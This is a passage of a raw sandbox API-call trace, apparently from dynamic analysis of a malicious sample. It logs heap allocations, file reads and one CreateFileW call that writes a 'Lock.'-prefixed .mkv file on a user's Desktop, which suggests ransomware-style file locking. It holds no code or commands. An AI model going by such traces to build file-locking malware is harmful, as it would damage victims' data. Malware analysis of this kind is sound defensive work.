RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64708 [0085.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0085.815] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.-yB2WD9ZHipl10.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.-yb2wd9zhipl10.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0085.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0085.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0085.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64690 | out: hHeap=0x2af0000) returned 1 [0085.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0085.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645b8 | out: hHeap=0x2af0000) returned 1 [0085.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0085.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0085.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebde8 | out: hHeap=0x2af0000) returned 1 [0085.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0085.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebe90 | out: hHeap=0x2af0000) returned 1 [0085.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0085.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0085.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0085.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0085.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64528 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64690 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646a8 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646a8 | out: hHeap=0x2af0000) returned 1 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64690 | out: hHeap=0x2af0000) returned 1 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64750 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64540 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0085.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64750 | out: hHeap=0x2af0000) returned 1 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0085.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0085.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0085.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64540 [0085.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0085.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x37c5020 [0085.819] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0085.819] ReadFile (in: hFile=0x294, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x3faa, lpOverlapped=0x0) returned 1 [0085.820] ReadFile (in: hFile=0x294, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0085.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0085.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0085.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0085.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3faa) returned 0x2a9a140 [0085.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c5020 | out: hHeap=0x2af0000) returned 1 [0085.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0085.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64528 | out: hHeap=0x2af0000) returned 1 [0085.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0085.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3a0 | out: hHeap=0x2af0000) returned 1 [0085.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0085.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0085.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0085.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3faa) returned 0x2a9e0f8 [0085.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0085.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0085.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645e8 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3faa) returned 0x2a9a140 [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645e8 | out: hHeap=0x2af0000) returned 1 [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0085.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0085.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76428 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0085.824] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76428 | out: hHeap=0x2af0000) returned 1 [0085.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645b8 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0085.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3faa) returned 0x2a9a140 [0085.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64750 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0085.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0085.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645e8 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0085.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64690 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a761f8 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646a8 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0085.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646a8 | out: hHeap=0x2af0000) returned 1 [0085.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76428 [0085.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0085.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0085.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0085.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730b8 | out: hHeap=0x2af0000) returned 1 [0085.826] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76658 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730b8 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0085.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647c8 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0085.826] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76270 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71308 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64888 | out: hHeap=0x2af0000) returned 1 [0085.826] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a38 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a762e8 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.826] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71338 | out: hHeap=0x2af0000) returned 1 [0085.827] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63c40 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71228 | out: hHeap=0x2af0000) returned 1 [0085.827] lstrlenW (lpString="20") returned 2 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63d48 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64120 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648d0 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712b8 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71208 | out: hHeap=0x2af0000) returned 1 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.827] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.827] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63d48 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71208 | out: hHeap=0x2af0000) returned 1 [0085.828] lstrlenW (lpString="31") returned 2 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63c40 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64108 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71288 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648d0 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712e8 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.828] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.828] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71388 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.828] 